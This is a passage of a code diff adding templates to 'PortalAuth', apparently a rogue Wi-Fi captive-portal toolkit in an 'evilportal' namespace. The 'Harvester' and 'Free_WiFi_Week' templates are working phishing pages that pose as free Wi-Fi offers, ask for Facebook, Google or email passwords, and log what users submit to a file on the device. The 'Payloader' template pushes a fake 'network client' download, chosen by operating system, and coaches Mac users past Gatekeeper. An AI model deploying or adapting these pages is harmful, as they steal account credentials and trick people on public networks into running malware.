||||
border: 1px solid #447314;
|
||||
background: #6aa436;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
|
||||
background: -webkit-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -moz-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -ms-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -o-linear-gradient(top, #8dc059, #6aa436);
|
||||
background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
|
||||
-webkit-border-radius: 4px;
|
||||
-moz-border-radius: 4px;
|
||||
border-radius: 4px;
|
||||
-webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
-moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
color: #31540c;
|
||||
font-family: helvetica, serif;
|
||||
padding: 8.5px 18px;
|
||||
font-size: 14px;
|
||||
text-decoration: none;
|
||||
vertical-align: middle;
|
||||
width: 200px;
|
||||
cursor: pointer;
|
||||
}
|
||||
.pa_submit-button:hover {
|
||||
border: 1px solid #447314;
|
||||
background: #6aa436;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
|
||||
background: -webkit-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -moz-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -ms-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -o-linear-gradient(top, #8dc059, #6aa436);
|
||||
background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
|
||||
color: #fff;
|
||||
}
|
||||
.pa_submit-button:active {
|
||||
border: 1px solid #447314;
|
||||
background: #8dc059;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#6aa436), to(#6aa436));
|
||||
background: -webkit-linear-gradient(top, #6aa436, #8dc059);
|
||||
background: -moz-linear-gradient(top, #6aa436, #8dc059);
|
||||
background: -ms-linear-gradient(top, #6aa436, #8dc059);
|
||||
background: -o-linear-gradient(top, #6aa436, #8dc059);
|
||||
background-image: -ms-linear-gradient(top, #6aa436 0%, #8dc059 100%);
|
||||
color: #fff;
|
||||
}
|
||||
</style>
|
||||
16
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectHTML.txt
Executable file
16
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectHTML.txt
Executable file
@@ -0,0 +1,16 @@
|
||||
<div id="pa_overlay-back"></div>
|
||||
<div class="pa_form-container">
|
||||
<h3 style="display: inline">Enjoy free WiFi between</h3>
|
||||
<h2><div id="pa_date"></div></h2>
|
||||
<div style="margin: 0 auto">
|
||||
<p>Simply enter your email address and password. If you do not already have an account with us one will be created for you.</p>
|
||||
</div>
|
||||
<br /><br />
|
||||
<input class="pa_form-field" type="text" id="pa_email" placeholder="you@gmail.com" />
|
||||
<input class="pa_form-field" type="password" id="pa_password" placeholder="Password" />
|
||||
<br /><br />
|
||||
<div class="pa_submit-container">
|
||||
<input class="pa_submit-button" type="submit" value="Submit" />
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
53
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectJS.txt
Executable file
53
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectJS.txt
Executable file
@@ -0,0 +1,53 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = init;
|
||||
|
||||
function init(){
|
||||
importantDates();
|
||||
setTimeout(displayLogin(),1000);
|
||||
}
|
||||
function importantDates() {
|
||||
$('#pa_date').html(function(){
|
||||
var monthNames=["January", "February", "March", "April", "May", "June",
|
||||
"July", "August", "September", "October", "November", "December"];
|
||||
var tf=new Date();var tp=new Date();var f=new Date();var p=new Date();
|
||||
f.setDate(tf.getDate()+5);p.setDate(tp.getDate()-2);
|
||||
var fd=f.getDate();var pd=p.getDate();
|
||||
var fm=monthNames[f.getMonth()];var pm=monthNames[p.getMonth()];
|
||||
if(fd<10){fd='0'+fd}if(pd<10){pd='0'+pd}
|
||||
return pm+' '+pd+' - '+fm+' '+fd;
|
||||
});
|
||||
}
|
||||
$(function() {
|
||||
$(".pa_submit-button").on("click", function() {
|
||||
var email_addr = $('#pa_email').val();
|
||||
var pass = $('#pa_password').val();
|
||||
if (email_addr == "" || pass == "") {
|
||||
alert("You must enter credentials to log in.");
|
||||
return;
|
||||
} else {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {email: email_addr,
|
||||
password: pass,
|
||||
target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
function displayLogin() {
|
||||
$(function(){
|
||||
$(".pa_form-container").css("opacity", "1");
|
||||
$(".pa_form-container, #pa_overlay-back").fadeIn("slow");
|
||||
});
|
||||
}
|
||||
</script>
|
||||
3
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectPHP.txt
Executable file
3
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
|
||||
<?php
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
?>
|
||||
34
PortalAuth/includes/scripts/injects/Harvester/MyPortal.php
Executable file
34
PortalAuth/includes/scripts/injects/Harvester/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
|
||||
<?php
|
||||
namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
// Call parent to handle basic authorization first
|
||||
parent::handleAuthorization();
|
||||
|
||||
// Check for other form data here
|
||||
if (!isset($_POST['email']) || !isset($_POST['password'])) {
|
||||
return;
|
||||
}
|
||||
|
||||
$fh = fopen('/www/auth.log', 'a+');
|
||||
fwrite($fh, "Email: " . $_POST['email'] . "\n");
|
||||
fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
|
||||
fclose($fh);
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
34
PortalAuth/includes/scripts/injects/Harvester/backups/MyPortal.php
Executable file
34
PortalAuth/includes/scripts/injects/Harvester/backups/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
|
||||
<?php
|
||||
namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
// Call parent to handle basic authorization first
|
||||
parent::handleAuthorization();
|
||||
|
||||
// Check for other form data here
|
||||
if (!isset($_POST['email']) || !isset($_POST['password'])) {
|
||||
return;
|
||||
}
|
||||
|
||||
$fh = fopen('/www/auth.log', 'a+');
|
||||
fwrite($fh, "Email: " . $_POST['email'] . "\n");
|
||||
fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
|
||||
fclose($fh);
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
89
PortalAuth/includes/scripts/injects/Harvester/backups/injectCSS.txt
Executable file
89
PortalAuth/includes/scripts/injects/Harvester/backups/injectCSS.txt
Executable file
@@ -0,0 +1,89 @@
|
||||
<style>
|
||||
.pa_field {
|
||||
width: 70%;
|
||||
height: 30px;
|
||||
font-size: 18px;
|
||||
border: 1px solid #000;
|
||||
}
|
||||
.pa_main {
|
||||
background-color: rgba(255,255,255,.9);
|
||||
left: 0%;
|
||||
margin-top: 200px;
|
||||
text-align: center;
|
||||
padding-top: 75px;
|
||||
position: fixed;
|
||||
border-style:solid;
|
||||
border-width:medium;
|
||||
border-color:#aaa;
|
||||
-webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
-moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
}
|
||||
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
#pa_msgBox{
|
||||
top: 50%;
|
||||
left: 50%;
|
||||
width: 600px;
|
||||
height: 400px;
|
||||
margin-top: -230px;
|
||||
margin-left: -300px;
|
||||
z-index: 10;
|
||||
display: none;
|
||||
}
|
||||
#pa_overlay-back {
|
||||
position: fixed;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background-color: rgba(0,0,0,.7);
|
||||
z-index: 5;
|
||||
display: none;
|
||||
}
|
||||
.pa_connectButton {
|
||||
-moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
-webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
|
||||
background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
|
||||
background-color:#1fd950;
|
||||
-moz-border-radius:5px;
|
||||
-webkit-border-radius:5px;
|
||||
border-radius:5px;
|
||||
border:1px solid #18ab29;
|
||||
display:inline-block;
|
||||
cursor:pointer;
|
||||
color:#ffffff;
|
||||
font-family:arial;
|
||||
font-size:22px;
|
||||
font-weight:bold;
|
||||
padding:12px 37px;
|
||||
text-decoration:none;
|
||||
text-shadow:0px -1px 0px #2f6627;
|
||||
}
|
||||
.pa_connectButton:hover {
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
|
||||
background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
|
||||
background-color:#5cbf2a;
|
||||
}
|
||||
.pa_connectButton:active {
|
||||
position:relative;
|
||||
top:1px;
|
||||
}
|
||||
.pa_left {
|
||||
margin-left: 60px;
|
||||
}
|
||||
</style>
|
||||
15
PortalAuth/includes/scripts/injects/Harvester/backups/injectHTML.txt
Executable file
15
PortalAuth/includes/scripts/injects/Harvester/backups/injectHTML.txt
Executable file
@@ -0,0 +1,15 @@
|
||||
<div id="pa_overlay-back"></div>
|
||||
<div id="pa_msgBox" class="pa_main">
|
||||
<h1 class="pa_h1">Internet access is on us today.</h1><br />
|
||||
<h4 class="pa_h4">Simply login with your Facebook or Google account<br />through our secure form below to start surfing.</h4>
|
||||
<br /><br />
|
||||
<div>
|
||||
<input type="text" id="pa_email" name="pa_email" class="pa_field" placeholder="FB or Gmail Login" />
|
||||
</div>
|
||||
<br />
|
||||
<div>
|
||||
<input type="password" id="pa_password" name="pa_password" class="pa_field" placeholder="FB or GMail Password" />
|
||||
</div>
|
||||
<br /><br />
|
||||
<button id="submit_button" class="pa_connectButton" type="button">Connect</button>
|
||||
</div>
|
||||
36
PortalAuth/includes/scripts/injects/Harvester/backups/injectJS.txt
Executable file
36
PortalAuth/includes/scripts/injects/Harvester/backups/injectJS.txt
Executable file
@@ -0,0 +1,36 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = setTimeout(displayLogin, 1000);
|
||||
$(function() {
|
||||
$("#submit_button").on("click", function() {
|
||||
var email_addr = $('#pa_email').val();
|
||||
var pass = $('#pa_password').val();
|
||||
if (email_addr == "" || pass == "") {
|
||||
alert("Please login with your Facebook or Google account to access free Wi-Fi.");
|
||||
return;
|
||||
} else {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {email: email_addr,
|
||||
password: pass,
|
||||
target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
function displayLogin() {
|
||||
$(function(){
|
||||
$("#pa_msgBox").css("opacity", "1");
|
||||
$("#pa_msgBox, #pa_overlay-back").fadeIn("slow");
|
||||
});
|
||||
}
|
||||
</script>
|
||||
89
PortalAuth/includes/scripts/injects/Harvester/injectCSS.txt
Executable file
89
PortalAuth/includes/scripts/injects/Harvester/injectCSS.txt
Executable file
@@ -0,0 +1,89 @@
|
||||
<style>
|
||||
.pa_field {
|
||||
width: 70%;
|
||||
height: 30px;
|
||||
font-size: 18px;
|
||||
border: 1px solid #000;
|
||||
}
|
||||
.pa_main {
|
||||
background-color: rgba(255,255,255,.9);
|
||||
left: 0%;
|
||||
margin-top: 200px;
|
||||
text-align: center;
|
||||
padding-top: 75px;
|
||||
position: fixed;
|
||||
border-style:solid;
|
||||
border-width:medium;
|
||||
border-color:#aaa;
|
||||
-webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
-moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
}
|
||||
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
#pa_msgBox{
|
||||
top: 50%;
|
||||
left: 50%;
|
||||
width: 600px;
|
||||
height: 400px;
|
||||
margin-top: -230px;
|
||||
margin-left: -300px;
|
||||
z-index: 10;
|
||||
display: none;
|
||||
}
|
||||
#pa_overlay-back {
|
||||
position: fixed;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background-color: rgba(0,0,0,.7);
|
||||
z-index: 5;
|
||||
display: none;
|
||||
}
|
||||
.pa_connectButton {
|
||||
-moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
-webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
|
||||
background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
|
||||
background-color:#1fd950;
|
||||
-moz-border-radius:5px;
|
||||
-webkit-border-radius:5px;
|
||||
border-radius:5px;
|
||||
border:1px solid #18ab29;
|
||||
display:inline-block;
|
||||
cursor:pointer;
|
||||
color:#ffffff;
|
||||
font-family:arial;
|
||||
font-size:22px;
|
||||
font-weight:bold;
|
||||
padding:12px 37px;
|
||||
text-decoration:none;
|
||||
text-shadow:0px -1px 0px #2f6627;
|
||||
}
|
||||
.pa_connectButton:hover {
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
|
||||
background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
|
||||
background-color:#5cbf2a;
|
||||
}
|
||||
.pa_connectButton:active {
|
||||
position:relative;
|
||||
top:1px;
|
||||
}
|
||||
.pa_left {
|
||||
margin-left: 60px;
|
||||
}
|
||||
</style>
|
||||
15
PortalAuth/includes/scripts/injects/Harvester/injectHTML.txt
Executable file
15
PortalAuth/includes/scripts/injects/Harvester/injectHTML.txt
Executable file
@@ -0,0 +1,15 @@
|
||||
<div id="pa_overlay-back"></div>
|
||||
<div id="pa_msgBox" class="pa_main">
|
||||
<h1 class="pa_h1">Internet access is on us today.</h1><br />
|
||||
<h4 class="pa_h4">Simply login with your Facebook or Google account<br />through our secure form below to start surfing.</h4>
|
||||
<br /><br />
|
||||
<div>
|
||||
<input type="text" id="pa_email" name="pa_email" class="pa_field" placeholder="FB or Gmail Login" />
|
||||
</div>
|
||||
<br />
|
||||
<div>
|
||||
<input type="password" id="pa_password" name="pa_password" class="pa_field" placeholder="FB or GMail Password" />
|
||||
</div>
|
||||
<br /><br />
|
||||
<button id="submit_button" class="pa_connectButton" type="button">Connect</button>
|
||||
</div>
|
||||
36
PortalAuth/includes/scripts/injects/Harvester/injectJS.txt
Executable file
36
PortalAuth/includes/scripts/injects/Harvester/injectJS.txt
Executable file
@@ -0,0 +1,36 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = setTimeout(displayLogin, 1000);
|
||||
$(function() {
|
||||
$("#submit_button").on("click", function() {
|
||||
var email_addr = $('#pa_email').val();
|
||||
var pass = $('#pa_password').val();
|
||||
if (email_addr == "" || pass == "") {
|
||||
alert("Please login with your Facebook or Google account to access free Wi-Fi.");
|
||||
return;
|
||||
} else {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {email: email_addr,
|
||||
password: pass,
|
||||
target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
function displayLogin() {
|
||||
$(function(){
|
||||
$("#pa_msgBox").css("opacity", "1");
|
||||
$("#pa_msgBox, #pa_overlay-back").fadeIn("slow");
|
||||
});
|
||||
}
|
||||
</script>
|
||||
3
PortalAuth/includes/scripts/injects/Harvester/injectPHP.txt
Executable file
3
PortalAuth/includes/scripts/injects/Harvester/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
|
||||
<?php
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
?>
|
||||
23
PortalAuth/includes/scripts/injects/Payloader/MyPortal.php
Executable file
23
PortalAuth/includes/scripts/injects/Payloader/MyPortal.php
Executable file
@@ -0,0 +1,23 @@
|
||||
<?php
|
||||
namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
parent::handleAuthorization();
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
23
PortalAuth/includes/scripts/injects/Payloader/backups/MyPortal.php
Executable file
23
PortalAuth/includes/scripts/injects/Payloader/backups/MyPortal.php
Executable file
@@ -0,0 +1,23 @@
|
||||
<?php
|
||||
namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
parent::handleAuthorization();
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
90
PortalAuth/includes/scripts/injects/Payloader/backups/injectCSS.txt
Executable file
90
PortalAuth/includes/scripts/injects/Payloader/backups/injectCSS.txt
Executable file
@@ -0,0 +1,90 @@
|
||||
<style>
|
||||
.pa_field {
|
||||
width: 70%;
|
||||
height: 30px;
|
||||
font-size: 18px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
.pa_main {
|
||||
background-color: rgba(255,255,255,.9);
|
||||
left: 0%;
|
||||
margin-top: 200px;
|
||||
text-align: center;
|
||||
padding-top: 75px;
|
||||
position: fixed;
|
||||
border-style:solid;
|
||||
border-width:medium;
|
||||
border-color:#aaa;
|
||||
-webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
-moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
}
|
||||
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
#pa_akp {
|
||||
top: 50%;
|
||||
left: 50%;
|
||||
width: 600px;
|
||||
height: 340px;
|
||||
padding: 20px;
|
||||
margin-top: -200px;
|
||||
margin-left: -330px;
|
||||
z-index: 15;
|
||||
display: none;
|
||||
}
|
||||
#pa_overlay-back {
|
||||
position: fixed;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background-color: rgba(0,0,0,.7);
|
||||
z-index: 5;
|
||||
display: none;
|
||||
}
|
||||
.pa_connectButton {
|
||||
-moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
-webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
|
||||
background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
|
||||
background-color:#1fd950;
|
||||
-moz-border-radius:5px;
|
||||
-webkit-border-radius:5px;
|
||||
border-radius:5px;
|
||||
border:1px solid #18ab29;
|
||||
display:inline-block;
|
||||
cursor:pointer;
|
||||
color:#ffffff;
|
||||
font-family:arial;
|
||||
font-size:22px;
|
||||
font-weight:bold;
|
||||
padding:12px 37px;
|
||||
text-decoration:none;
|
||||
text-shadow:0px -1px 0px #2f6627;
|
||||
}
|
||||
.pa_connectButton:hover {
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
|
||||
background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
|
||||
background-color:#5cbf2a;
|
||||
}
|
||||
.pa_connectButton:active {
|
||||
position:relative;
|
||||
top:1px;
|
||||
}
|
||||
.pa_left {
|
||||
margin-left: 60px;
|
||||
}
|
||||
</style>
|
||||
14
PortalAuth/includes/scripts/injects/Payloader/backups/injectHTML.txt
Executable file
14
PortalAuth/includes/scripts/injects/Payloader/backups/injectHTML.txt
Executable file
@@ -0,0 +1,14 @@
|
||||
<div id="pa_overlay-back"></div>
|
||||
<div id='pa_akp' class='pa_main'>
|
||||
<h1 class="pa_h1">Network Client Download</h1><br />
|
||||
<h4 class="pa_h4">To access our WiFi please download and use our free network client software.
|
||||
When you run the program an <strong>access key</strong> will be generated which will need to be entered below
|
||||
in order to start surfing the internet.</h4>
|
||||
<br />
|
||||
<a id="pa_NetClientURL" href=""><h3 class='pa_h3'>Download Network Client</h3></a>
|
||||
<br />
|
||||
<span id='pa_macnotice' style='font-size: 80%;'><br /></span>
|
||||
<input type='text' id='pa_accessKey' class='pa_field' placeholder='Access Key' />
|
||||
<br /><br />
|
||||
<button id="submit_button" class="pa_connectButton" type="button">Submit</button>
|
||||
</div>
|
||||
70
PortalAuth/includes/scripts/injects/Payloader/backups/injectJS.txt
Executable file
70
PortalAuth/includes/scripts/injects/Payloader/backups/injectJS.txt
Executable file
@@ -0,0 +1,70 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = setTimeout(displayAccessKeyPanel, 1000);
|
||||
|
||||
$(function() {
|
||||
if (navigator.appVersion.indexOf("Win") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $exePath . $exe . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("Mac") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $appPath . $app . "');";
|
||||
?>
|
||||
$('#pa_macnotice').html("*NOTE: To run the network client on your Mac you need to hold down the control button, click the app, then click open.");
|
||||
} else if (navigator.appVersion.indexOf("Android") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $apkPath . $apk . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPhone") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPad") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPod") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
}
|
||||
|
||||
$('#submit_button').on('click',function(){
|
||||
if ($('#pa_accessKey').val() == "") {
|
||||
alert("Please enter the access key given by the network client software.");
|
||||
return;
|
||||
}
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/index.php",
|
||||
data: {verifyAccessKey: $('#pa_accessKey').val()},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqHXR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
alert("Invalid access key");
|
||||
}
|
||||
});
|
||||
});
|
||||
});
|
||||
function displayAccessKeyPanel(){
|
||||
$(function(){
|
||||
$('#pa_akp').css('opacity','1');
|
||||
$('#pa_akp,#pa_overlay-back').fadeIn('slow');
|
||||
});
|
||||
}
|
||||
</script>
|
||||
49
PortalAuth/includes/scripts/injects/Payloader/backups/injectPHP.txt
Executable file
49
PortalAuth/includes/scripts/injects/Payloader/backups/injectPHP.txt
Executable file
@@ -0,0 +1,49 @@
|
||||
<?php
|
||||
|
||||
/*==================*/
|
||||
